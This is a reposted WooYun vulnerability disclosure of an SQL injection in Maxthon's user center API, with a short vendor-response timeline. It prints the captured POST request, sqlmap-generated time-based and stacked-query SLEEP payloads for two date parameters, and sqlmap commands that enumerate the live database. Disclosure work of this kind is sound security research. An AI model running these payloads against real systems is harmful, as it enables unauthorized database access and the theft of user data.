傲游用户中心SQL注入漏洞泄露大量用户信息

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-05-23: 细节已通知厂商并且等待厂商处理中
2016-05-23: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-05-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

周六无聊吃了饭看了看偶然发现·····
没有查询具体数据,老家的小水管受不起····
没有深入测试其他问题

详细说明:

 

code 区域
POST /api/scorelist HTTP/1.1
Host: my.maxthon.cn
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.7.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://my.maxthon.cn/score.html
Content-Length: 70
Cookie: **.***.**.**
Connection: close
Pragma: no-cache
Cache-Control: no-cache

formkey=caa6bb30&from=2013-05-16&to=2016-05-26&type=&page=1





payload



code 区域
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: to (POST)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: formkey=caa6bb30&from=2013-05-16&to=2016-05-26';(SELECT * FROM (SELECT(SLEEP(5)))Atjg)#&type=&page=1

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: formkey=caa6bb30&from=2013-05-16&to=2016-05-26' AND (SELECT * FROM (SELECT(SLEEP(5)))gGIX) AND 'CVSc'='CVSc&type=&page=1

Parameter: from (POST)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: formkey=caa6bb30&from=2013-05-16';(SELECT * FROM (SELECT(SLEEP(5)))Qbzm)#&to=2016-05-26&type=&page=1

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: formkey=caa6bb30&from=2013-05-16' AND (SELECT * FROM (SELECT(SLEEP(5)))owig) AND 'odrf'='odrf&to=2016-05-26&type=&page=1





sqlmap -r /root/Desktop/1.txt --current-db



current database: 'my_maxthon_cn'



漏洞证明:

sqlmap -r /root/Desktop/1.txt -D my_maxthon_cn --count



404.so

 

修复方案:

过滤···

请多指教~

版权声明:转载请注明来源 美食家L@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-05-28 13:30

厂商回复:

 

漏洞Rank:8 (WooYun评价)

最新状态:

暂无


本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度已收录『查看详情』

本文链接:傲游用户中心SQL注入漏洞泄露大量用户信息 - https://www.15qq.cn/wooyun/375.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知